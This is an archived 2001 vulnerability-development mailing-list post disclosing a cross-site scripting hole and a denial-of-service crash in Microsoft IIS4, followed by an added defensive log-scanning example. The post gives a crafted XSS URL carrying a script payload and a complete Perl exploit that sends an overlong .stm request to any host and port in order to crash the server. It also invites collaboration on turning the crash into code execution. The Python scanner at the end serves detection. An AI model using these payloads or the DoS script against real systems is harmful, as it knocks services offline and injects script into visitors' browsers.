Vulnerability Development
mailing list archives
New D.O.S on IIS4 & a new cross site scripting vuln
From: "Admin [iSecureLabs]" <admin () ISECURELABS COM>
Date: Thu, 29 Mar 2001 16:55:08 +0200
--[ iSecureLabs.com French Security Team ]--
We have found 2 vulnerabilities in Microsoft IIS4
- Cross Site Scripting
- D.O.S
--[ The first one:
It is a cross site scripting, using this crafted url
http://server.com/foo/<script>alert('test')</script>.stm
it will execute the JavaScript code on your computer.
--[ The second one:
By requesting several times a .stm file 500 chars long
(http://server.com/foo/[a x 500].stm) the IIS4 server crashes.
Perhaps it is possible to use this vulnerability to execute arbitrary code.
We are currently working on a way to exploit this vulnerability.
If someone wants to help us, it is ok ;-)
Here is the exploit for the D.O.S one:
---<cut>---
#!/usr/bin/perl
# IIS4 .STM D.O.S by aurelien.cabezon () iSecureLabs com - http://www.iSecureLabs.com
use IO::Socket;

if (@ARGV < 2) { print "Usage: ./stm.pl <host> <port>\n"; exit; }

# 500-character file name placed before the .stm extension
$overflow = "a" x 500;

sub connect()
{
    $Socket = IO::Socket::INET->new(Proto=>"TCP",
                                    PeerAddr=>$ARGV[0],
                                    PeerPort=>"$ARGV[1]",)
        or die "Connection impossible a $ARGV[0] : $!\n";
    $Socket -> autoflush(1);
    print $Socket "GET /foo/$overflow.stm HTTP/1.0\n\n";
    print " \n\n> GET $ARGV[0]/foo/$overflow.stm HTTP/1.0\n\n";
    print " > Server response:\n\n";
    # Print each line of the server response
    while ($reponse = <$Socket>) {
        chomp ($reponse);
        print "$reponse\n";
    }
    print "\n> Data Sent. Server crashed.\n";
    close $Socket;
}
&connect;
---<cut>---
Cabezon Aurélien
aurelien.cabezon () iSecureLabs com
http://www.iSecureLabs.com
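
Added example, not part of the original post: a log check that flags the two request shapes described above, a .stm path carrying markup characters and a .stm file name of 500 or more characters. The Common Log Format request line, the function names, the threshold and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed log layout: the request appears as "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r"[<>]")
LONG_NAME = 500  # length quoted in the post; assumed threshold, tune lower in practice


def classify(log_line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    # Drop the query string, then decode so %3Cscript%3E is seen as <script>.
    path = unquote(m.group("target").split("?", 1)[0])
    if not path.lower().endswith(".stm"):
        return []
    name = path.rsplit("/", 1)[-1]
    findings = []
    if MARKUP_RE.search(path):
        findings.append("markup-in-stm-path")
    if len(name) >= LONG_NAME:
        findings.append("long-stm-name")
    return findings


def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {i: f for i, line in enumerate(lines, 1) if (f := classify(line))}


# Constructed sample log lines (addresses, timestamps and status codes are made up)
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Mar/2001:16:55:08 +0200] "GET /foo/index.stm HTTP/1.0" 200 512',
    '192.0.2.11 - - [29/Mar/2001:16:55:09 +0200] "GET /foo/%3Cscript%3Ealert(1)%3C/script%3E.stm HTTP/1.0" 404 0',
    '192.0.2.12 - - [29/Mar/2001:16:55:10 +0200] "GET /foo/' + "a" * 500 + '.stm HTTP/1.0" 404 0',
    '192.0.2.13 - - [29/Mar/2001:16:55:11 +0200] "GET /foo/page.html HTTP/1.0" 200 128',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, ", ".join(findings))
```

Repeated "long-stm-name" hits from one client in a short window match the "several times" pattern the post describes and are worth alerting on as a group.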